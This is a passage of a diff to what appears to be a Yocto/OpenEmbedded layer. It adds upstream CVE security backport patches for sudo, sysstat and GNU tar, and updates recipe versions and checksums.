+- len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name);
+- if (tsid != NULL)
+- len += sizeof(LL_TSID_STR) + 2 + strlen(tsid);
+- if (sudo_user.env_vars != NULL) {
+- size_t evlen = 0;
+- char * const *ep;
+-
+- for (ep = sudo_user.env_vars; *ep != NULL; ep++)
+- evlen += strlen(*ep) + 1;
+- if (evlen != 0) {
+- if ((evstr = malloc(evlen)) == NULL)
+- goto oom;
+- evstr[0] = '\0';
+- for (ep = sudo_user.env_vars; *ep != NULL; ep++) {
+- strlcat(evstr, *ep, evlen);
+- strlcat(evstr, " ", evlen); /* NOTE: last one will fail */
+- }
+- len += sizeof(LL_ENV_STR) + 2 + evlen;
+- }
+- }
+- if (user_cmnd != NULL) {
+- /* Note: we log "sudo -l command arg ..." as "list command arg ..." */
+- len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd);
+- if (ISSET(sudo_mode, MODE_CHECK))
+- len += sizeof("list ") - 1;
+- if (user_args != NULL)
+- len += strlen(user_args) + 1;
+- }
+-
+- /*
+- * Allocate and build up the line.
+- */
+- if ((line = malloc(++len)) == NULL)
+- goto oom;
+- line[0] = '\0';
+
+ if (message != NULL) {
+- if (strlcat(line, message, len) >= len ||
+- strlcat(line, errstr ? " : " : " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message,
++ errstr ? " : " : " ; ");
+ }
+ if (errstr != NULL) {
+- if (strlcat(line, errstr, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- }
+- if (strlcat(line, LL_TTY_STR, len) >= len ||
+- strlcat(line, user_tty, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- if (strlcat(line, LL_CWD_STR, len) >= len ||
+- strlcat(line, user_cwd, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr);
++ }
++ if (user_tty != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty);
++ }
++ if (user_cwd != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd);
++ }
+ if (runas_pw != NULL) {
+- if (strlcat(line, LL_USER_STR, len) >= len ||
+- strlcat(line, runas_pw->pw_name, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ",
++ runas_pw->pw_name);
+ }
+ if (runas_gr != NULL) {
+- if (strlcat(line, LL_GROUP_STR, len) >= len ||
+- strlcat(line, runas_gr->gr_name, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
++ runas_gr->gr_name);
+ }
+ if (tsid != NULL) {
+- if (strlcat(line, LL_TSID_STR, len) >= len ||
+- strlcat(line, tsid, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- }
+- if (evstr != NULL) {
+- if (strlcat(line, LL_ENV_STR, len) >= len ||
+- strlcat(line, evstr, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- free(evstr);
+- evstr = NULL;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid);
++ }
++ if (sudo_user.env_vars != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]);
++ for (i = 1; sudo_user.env_vars[i] != NULL; i++) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
++ sudo_user.env_vars[i]);
++ }
+ }
+ if (user_cmnd != NULL) {
+- if (strlcat(line, LL_CMND_STR, len) >= len)
+- goto toobig;
+- if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len)
+- goto toobig;
+- if (strlcat(line, user_cmnd, len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
++ "COMMAND=%s", user_cmnd);
+ if (user_args != NULL) {
+- if (strlcat(line, " ", len) >= len ||
+- strlcat(line, user_args, len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf,
++ LBUF_ESC_CNTRL|LBUF_ESC_QUOTE,
++ " %s", user_args);
+ }
+ }
+
+- debug_return_str(line);
+-oom:
+- free(evstr);
++ if (!sudo_lbuf_error(&lbuf))
++ debug_return_str(lbuf.buf);
++
++ sudo_lbuf_destroy(&lbuf);
+ sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
+ debug_return_str(NULL);
+-toobig:
+- free(evstr);
+- free(line);
+- sudo_warnx(U_("internal error, %s overflow"), __func__);
+- debug_return_str(NULL);
+ }
+--- a/plugins/sudoers/sudoreplay.c
++++ b/plugins/sudoers/sudoreplay.c
+@@ -71,6 +71,7 @@
+ #include "sudo_conf.h"
+ #include "sudo_debug.h"
+ #include "sudo_event.h"
++#include "sudo_lbuf.h"
+ #include "sudo_util.h"
+
+ #ifdef HAVE_GETOPT_LONG
+@@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head
+ }
+
+ static int
+-list_session(char *logfile, regex_t *re, const char *user, const char *tty)
++list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re,
++ const char *user, const char *tty)
+ {
+ char idbuf[7], *idstr, *cp;
+ const char *timestr;
+@@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re,
+ }
+ /* XXX - print rows + cols? */
+ timestr = get_timestr(li->tstamp, 1);
+- printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ",
+- timestr ? timestr : "invalid date",
+- li->user, li->tty, li->cwd, li->runas_user);
+- if (li->runas_group)
+- printf("GROUP=%s ; ", li->runas_group);
+- printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd);
+-
+- ret = 0;
+-
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ",
++ timestr ? timestr : "invalid date", li->user);
++ if (li->tty != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ",
++ li->tty);
++ }
++ if (li->cwd != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ",
++ li->cwd);
++ }
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user);
++ if (li->runas_group != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
++ li->runas_group);
++ }
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr);
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s",
++ li->cmd);
++
++ if (!sudo_lbuf_error(lbuf)) {
++ puts(lbuf->buf);
++ ret = 0;
++ }
+ done:
++ lbuf->error = 0;
++ lbuf->len = 0;
+ free_log_info(li);
+ debug_return_int(ret);
+ }
+@@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t *
+ DIR *d;
+ struct dirent *dp;
+ struct stat sb;
++ struct sudo_lbuf lbuf;
+ size_t sdlen, sessions_len = 0, sessions_size = 0;
+ unsigned int i;
+ int len;
+@@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t *
+ #endif
+ debug_decl(find_sessions, SUDO_DEBUG_UTIL)
+
++ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
++
+ d = opendir(dir);
+ if (d == NULL)
+ sudo_fatal(U_("unable to open %s"), dir);
+@@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t *
+
+ /* Check for dir with a log file. */
+ if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) {
+- list_session(pathbuf, re, user, tty);
++ list_session(&lbuf, pathbuf, re, user, tty);
+ } else {
+ /* Strip off "/log" and recurse if a dir. */
+ pathbuf[sdlen + len - 4] = '\0';
+@@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t *
+ }
+ free(sessions);
+ }
++ sudo_lbuf_destroy(&lbuf);
+
+ debug_return_int(0);
+ }
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
new file mode 100644
index 0000000000..d021873b70
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
@@ -0,0 +1,26 @@
+Backport of:
+
+From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Mon, 13 Mar 2023 08:04:32 -0600
+Subject: [PATCH] Add missing " ; " separator between environment variables and
+ command. This is a regression introduced in sudo 1.9.13. GitHub issue #254.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/eventlog/eventlog.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -1018,6 +1018,7 @@ new_logline(const char *message, const c
+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
+ sudo_user.env_vars[i]);
+ }
++ sudo_lbuf_append(&lbuf, " ; ");
+ }
+ if (user_cmnd != NULL) {
+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
diff --git a/meta/recipes-extended/sudo/sudo_1.8.31.bb b/meta/recipes-extended/sudo/sudo_1.8.32.bb
index 39d8817c32..e35bbfa789 100644
--- a/meta/recipes-extended/sudo/sudo_1.8.31.bb
+++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb
@@ -3,12 +3,17 @@ require sudo.inc
SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \
${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
file://0001-Include-sys-types.h-for-id_t-definition.patch \
+ file://0001-Fix-includes-when-building-with-musl.patch \
+ file://CVE-2022-43995.patch \
+ file://CVE-2023-22809.patch \
+ file://CVE-2023-28486_CVE-2023-28487-1.patch \
+ file://CVE-2023-28486_CVE-2023-28487-2.patch \
"
PAM_SRC_URI = "file://sudo.pam"
-SRC_URI[md5sum] = "ce17ff6e72a70f8d5dabba8abf3cd2de"
-SRC_URI[sha256sum] = "7ea8d97a3cee4c844e0887ea7a1bd80eb54cc98fd77966776cb1a80653ad454f"
+SRC_URI[md5sum] = "a7318202ba391079a0e32933f0fb8bd6"
+SRC_URI[sha256sum] = "5ce3c18c5efbecd5437a0945f314f1822423eaf9a2d7eb7ecf80857bc32246c5"
DEPENDS += " virtual/crypt ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
RDEPENDS_${PN} += " ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-limits pam-plugin-keyinit', '', d)}"
diff --git a/meta/recipes-extended/sysklogd/sysklogd.inc b/meta/recipes-extended/sysklogd/sysklogd.inc
index 8899daa1b0..e45b256bbe 100644
--- a/meta/recipes-extended/sysklogd/sysklogd.inc
+++ b/meta/recipes-extended/sysklogd/sysklogd.inc
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \
inherit update-rc.d update-alternatives systemd autotools
-SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \
+SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \
file://sysklogd \
file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \
"
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
new file mode 100644
index 0000000000..972cc8938b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
@@ -0,0 +1,92 @@
+From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001
+From: Sebastien <seb@fedora-2.home>
+Date: Sat, 15 Oct 2022 14:24:22 +0200
+Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074)
+
+allocate_structures function located in sa_common.c insufficiently
+checks bounds before arithmetic multiplication allowing for an
+overflow in the size allocated for the buffer representing system
+activities.
+
+This patch checks that the post-multiplied value is not greater than
+UINT_MAX.
+
+Signed-off-by: Sebastien <seb@fedora-2.home>
+
+Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540]
+CVE : CVE-2022-39377
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common.c | 25 +++++++++++++++++++++++++
+ common.h | 2 ++
+ sa_common.c | 6 ++++++
+ 3 files changed, 33 insertions(+)
+
+diff --git a/common.c b/common.c
+index ddfe75d..28d475e 100644
+--- a/common.c
++++ b/common.c
+@@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char
+
+ return 0;
+ }
++
++/*
++ ***************************************************************************
++ * Check if the multiplication of the 3 values may be greater than UINT_MAX.
++ *
++ * IN:
++ * @val1 First value.
++ * @val2 Second value.
++ * @val3 Third value.
++ ***************************************************************************
++ */
++void check_overflow(size_t val1, size_t val2, size_t val3)
++{
++ if ((unsigned long long) val1 *
++ (unsigned long long) val2 *
++ (unsigned long long) val3 > UINT_MAX) {
++#ifdef DEBUG
++ fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
++ __FUNCTION__,
++ (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++#endif
++ exit(4);
++ }
++}
++
+ #endif /* SOURCE_SADC undefined */
+diff --git a/common.h b/common.h
+index 86905ba..75f837a 100644
+--- a/common.h
++++ b/common.h
+@@ -249,6 +249,8 @@ int get_wwnid_from_pretty
+ (char *, unsigned long long *, unsigned int *);
+
+ #ifndef SOURCE_SADC
++void check_overflow
++ (size_t, size_t, size_t);
+ int count_bits
+ (void *, int);
+ int count_csvalues
+diff --git a/sa_common.c b/sa_common.c
+index 8a03099..ff90c1f 100644
+--- a/sa_common.c
++++ b/sa_common.c
+@@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[])
+ int i, j;
+
+ for (i = 0; i < NR_ACT; i++) {
++
+ if (act[i]->nr_ini > 0) {
++
++ /* Look for a possible overflow */
++ check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini,
++ (size_t) act[i]->nr2);
++
+ for (j = 0; j < 3; j++) {
+ SREALLOC(act[i]->buf[j], void,
+ (size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2);
+--
+2.25.1
+
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
new file mode 100644
index 0000000000..9a27945a8b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
@@ -0,0 +1,46 @@
+Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-02-18
+
+From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001
+From: Pavel Kopylov <pkopylov@cloudlinux.com>
+Date: Wed, 17 May 2023 11:33:45 +0200
+Subject: [PATCH] Fix an overflow which is still possible for some values.
+
+CVE: CVE-2023-33204
+Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ common.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+Index: sysstat-12.0.3/common.c
+===================================================================
+--- sysstat-12.0.3.orig/common.c
++++ sysstat-12.0.3/common.c
+@@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned
+ */
+ void check_overflow(size_t val1, size_t val2, size_t val3)
+ {
+- if ((unsigned long long) val1 *
+- (unsigned long long) val2 *
+- (unsigned long long) val3 > UINT_MAX) {
++ if ((val1 != 0) && (val2 != 0) && (val3 != 0) &&
++ (((unsigned long long) UINT_MAX / (unsigned long long) val1 <
++ (unsigned long long) val2) ||
++ ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) <
++ (unsigned long long) val3))) {
+ #ifdef DEBUG
+- fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
+- __FUNCTION__,
+- (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++ fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n",
++ __FUNCTION__, val1, val2, val3);
+ #endif
+- exit(4);
++ exit(4);
+ }
+ }
+
diff --git a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
index 2a90f89d25..ac7b898db9 100644
--- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
+++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
@@ -2,7 +2,10 @@ require sysstat.inc
LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb"
-SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch"
+SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \
+ file://CVE-2022-39377.patch \
+ file://CVE-2023-33204.patch \
+ "
SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb"
SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732"
diff --git a/meta/recipes-extended/tar/tar/CVE-2021-20193.patch b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
new file mode 100644
index 0000000000..89e8e20844
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
@@ -0,0 +1,133 @@
+From d9d4435692150fa8ff68e1b1a473d187cc3fd777 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sun, 17 Jan 2021 20:41:11 +0200
+Subject: Fix memory leak in read_header
+
+Bug reported in https://savannah.gnu.org/bugs/?59897
+
+* src/list.c (read_header): Don't return directly from the loop.
+Instead set the status and break. Return the status. Free
+next_long_name and next_long_link before returning.
+
+CVE: CVE-2021-20193
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/tar.git/patch/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777]
+Signed-off-by: Anatol Belski <anbelski@linux.microsoft.com>
+
+---
+ src/list.c | 40 ++++++++++++++++++++++++++++------------
+ 1 file changed, 28 insertions(+), 12 deletions(-)
+
+diff --git a/src/list.c b/src/list.c
+index e40a5c8..d7ef441 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -408,26 +408,27 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ enum read_header_mode mode)
+ {
+ union block *header;
+- union block *header_copy;
+ char *bp;
+ union block *data_block;
+ size_t size, written;
+- union block *next_long_name = 0;
+- union block *next_long_link = 0;
++ union block *next_long_name = NULL;
++ union block *next_long_link = NULL;
+ size_t next_long_name_blocks = 0;
+ size_t next_long_link_blocks = 0;
+-
++ enum read_header status = HEADER_SUCCESS;
++
+ while (1)
+ {
+- enum read_header status;
+-
+ header = find_next_block ();
+ *return_block = header;
+ if (!header)
+- return HEADER_END_OF_FILE;
++ {
++ status = HEADER_END_OF_FILE;
++ break;
++ }
+
+ if ((status = tar_checksum (header, false)) != HEADER_SUCCESS)
+- return status;
++ break;
+
+ /* Good block. Decode file size and return. */
+
+@@ -437,7 +438,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ {
+ info->stat.st_size = OFF_FROM_HEADER (header->header.size);
+ if (info->stat.st_size < 0)
+- return HEADER_FAILURE;
++ {
++ status = HEADER_FAILURE;
++ break;
++ }
+ }
+
+ if (header->header.typeflag == GNUTYPE_LONGNAME
+@@ -447,10 +451,14 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ || header->header.typeflag == SOLARIS_XHDTYPE)
+ {
+ if (mode == read_header_x_raw)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+ else if (header->header.typeflag == GNUTYPE_LONGNAME
+ || header->header.typeflag == GNUTYPE_LONGLINK)
+ {
++ union block *header_copy;
+ size_t name_size = info->stat.st_size;
+ size_t n = name_size % BLOCKSIZE;
+ size = name_size + BLOCKSIZE;
+@@ -517,7 +525,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ xheader_decode_global (&xhdr);
+ xheader_destroy (&xhdr);
+ if (mode == read_header_x_global)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+ }
+
+ /* Loop! */
+@@ -536,6 +547,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ name = next_long_name->buffer + BLOCKSIZE;
+ recent_long_name = next_long_name;
+ recent_long_name_blocks = next_long_name_blocks;
++ next_long_name = NULL;
+ }
+ else
+ {
+@@ -567,6 +579,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ name = next_long_link->buffer + BLOCKSIZE;
+ recent_long_link = next_long_link;
+ recent_long_link_blocks = next_long_link_blocks;
++ next_long_link = NULL;
+ }
+ else
+ {
+@@ -578,9 +591,12 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ }
+ assign_string (&info->link_name, name);
+
+- return HEADER_SUCCESS;
++ break;
+ }
+ }
++ free (next_long_name);
++ free (next_long_link);
++ return status;
+ }
+
+ #define ISOCTAL(c) ((c)>='0'&&(c)<='7')
+--
+cgit v1.2.1
+
diff --git a/meta/recipes-extended/tar/tar/CVE-2022-48303.patch b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
new file mode 100644
index 0000000000..b2f40f3e64
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
@@ -0,0 +1,43 @@
+From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 11 Feb 2023 11:57:39 +0200
+Subject: Fix boundary checking in base-256 decoder
+
+* src/list.c (from_header): Base-256 encoding is at least 2 bytes
+long.
+
+Upstream-Status: Backport [see reference below]
+CVE: CVE-2022-48303
+
+Reference to upstream patch:
+https://savannah.gnu.org/bugs/?62387
+https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8
+
+Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+---
+ src/list.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+
+
+(limited to 'src/list.c')
+
+diff --git a/src/list.c b/src/list.c
+index 9fafc42..86bcfdd 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type,
+ where++;
+ }
+ }
+- else if (*where == '\200' /* positive base-256 */
+- || *where == '\377' /* negative base-256 */)
++ else if (where <= lim - 2
++ && (*where == '\200' /* positive base-256 */
++ || *where == '\377' /* negative base-256 */))
+ {
+ /* Parse base-256 output. A nonnegative number N is
+ represented as (256**DIGS)/2 + N; a negative number -N is
+--
+cgit v1.1
+
diff --git a/meta/recipes-extended/tar/tar/CVE-2023-39804.patch b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
new file mode 100644
index 0000000000..f550928540
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
@@ -0,0 +1,64 @@
+From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 28 Aug 2021 16:02:12 +0300
+Subject: Fix handling of extended header prefixes
+
+* src/xheader.c (locate_handler): Recognize prefix keywords only
+when followed by a dot.
+(xattr_decoder): Use xmalloc/xstrdup instead of alloc
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4]
+CVE: CVE-2023-39804
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xheader.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/src/xheader.c b/src/xheader.c
+index 4f8b2b2..3cd694d 100644
+--- a/src/xheader.c
++++ b/src/xheader.c
+@@ -637,11 +637,11 @@ static struct xhdr_tab const *
+ locate_handler (char const *keyword)
+ {
+ struct xhdr_tab const *p;
+-
+ for (p = xhdr_tab; p->keyword; p++)
+ if (p->prefix)
+ {
+- if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0)
++ size_t kwlen = strlen (p->keyword);
++ if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0)
+ return p;
+ }
+ else
+@@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st,
+ char const *keyword, char const *arg, size_t size)
+ {
+ char *xstr, *xkey;
+-
++
+ /* copy keyword */
+- size_t klen_raw = strlen (keyword);
+- xkey = alloca (klen_raw + 1);
+- memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */;
++ xkey = xstrdup (keyword);
+
+ /* copy value */
+- xstr = alloca (size + 1);
++ xstr = xmalloc (size + 1);
+ memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */;
+
+ xattr_decode_keyword (xkey);
+
+- xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size);
++ xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size);
++
++ free (xkey);
++ free (xstr);
+ }
+
+ static void
+--
+cgit v1.1
+
diff --git a/meta/recipes-extended/tar/tar_1.32.bb b/meta/recipes-extended/tar/tar_1.32.bb
index ebe6cb0dbd..9297480e85 100644
--- a/meta/recipes-extended/tar/tar_1.32.bb
+++ b/meta/recipes-extended/tar/tar_1.32.bb
@@ -6,8 +6,13 @@ SECTION = "base"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
+PR = "r1"
+
SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \
file://musl_dirent.patch \
+ file://CVE-2021-20193.patch \
+ file://CVE-2022-48303.patch \
+ file://CVE-2023-39804.patch \
"
SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05"
@@ -64,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native"
NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}"
BBCLASSEXTEND = "native nativesdk"
+
+# Avoid false positives from CVEs in node-tar package
+# For example CVE-2021-{32803,32804,37701,37712,37713}
+CVE_PRODUCT = "gnu:tar"
diff --git a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
index ec04bfe390..a942ac2991 100644
--- a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
+++ b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
@@ -1,5 +1,6 @@
SUMMARY = "Fake version of the texinfo utility suite"
SECTION = "console/utils"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb"
DEPENDS = ""
diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc
index 5368464f30..46bc1b794e 100644
--- a/meta/recipes-extended/timezone/timezone.inc
+++ b/meta/recipes-extended/timezone/timezone.inc
@@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \
the history of local time for many representative locations around the globe."
HOMEPAGE = "http://www.iana.org/time-zones"
SECTION = "base"
-LICENSE = "PD & BSD & BSD-3-Clause"
+LICENSE = "PD & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
-PV = "2020d"
+PV = "2024a"
SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \
http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \
@@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz
UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
-SRC_URI[tzcode.sha256sum] = "6cf050ba28e8053029d3f32d71341d11a794c6b5dd51a77fc769d6dae364fad5"
